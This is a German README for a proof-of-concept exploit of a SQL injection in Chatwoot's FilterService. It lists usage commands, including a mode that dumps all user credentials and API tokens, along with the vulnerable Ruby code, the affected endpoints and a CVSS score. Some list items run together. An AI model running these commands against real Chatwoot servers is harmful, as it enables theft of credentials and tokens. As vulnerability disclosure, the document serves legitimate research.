
Chatwoot SQL-Injection in FilterService
Ein Proof-of-Concept-Exploit für CVE-2026-44706, eine SQL-Injection-Schwachstelle in Chatwoots FilterService#lt_gt_filter_values, die es jedem authentifizierten Agenten ermöglicht, die gesamte PostgreSQL-Datenbank inklusive Benutzeranmeldeinformationen und API-Tokens auszulesen. Lesen Sie den vollständigen Artikel hier.
Verwendung:
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
In app/services/filter_service.rb (Zeile 91) wird Benutzereingabe direkt ohne Parametrisierung in SQL interpoliert:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← user input, no sanitization
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation
end
Jeder andere Operator in der Klasse verwendet Bindeparameter (:value_N). Nur is_greater_than und is_less_than sind anfällig.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 SQL-Injection. Jeder authentifizierte Agent/Administrator kann:
pg_sleep() um Datenbankverbindungen zu erschöpfen8.8 Hoch CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Dieses Tool dient ausschließlich Bildungs- und Forschungszwecken. Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Testberechtigung haben. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
QuimeraX Intelligence ist eine fortschrittliche EASM- und Cyber-Threat-Intelligence-Plattform, die sich auf die Identifizierung kritischer Schwachstellen in komplexen Systemen spezialisiert hat. Die Plattform überwacht, erkennt und warnt Kunden proaktiv vor Sicherheitsbedrohungen und sorgt so für Transparenz und schnelle Reaktion auf potenzielle Risiken. Kunden erhalten sofortige Benachrichtigungen und umfassende Berichte, wenn ihre Systeme als anfällig eingestuft werden, sodass sie Schutzmaßnahmen ergreifen können. mehr erfahren
Hakai Security ist ein Cybersicherheitsunternehmen, das von Sicherheitsexperten gegründet wurde und sich technischer Exzellenz verschrieben hat. Wir bieten maßgeschneiderte Sicherheitslösungen, darunter fortgeschrittene Penetrationstests, realistische Red-Team-Simulationen und sichere Entwicklungspraktiken, um die Vermögenswerte unserer Kunden proaktiv vor sich entwickelnden Cyber-Bedrohungen zu schützen.
Hacking Club ist die Trainingsplattform, auf der Sie Cybersicherheit durch praktische Lektionen, Labore und Herausforderungen erlernen, die von Experten aus unserer Sicherheitsberatung erstellt wurden: direkt vom Schlachtfeld zu Ihrem Training. Üben Sie die in diesem Repository vorgestellte Schwachstelle mit dem Hacking Club! mehr erfahren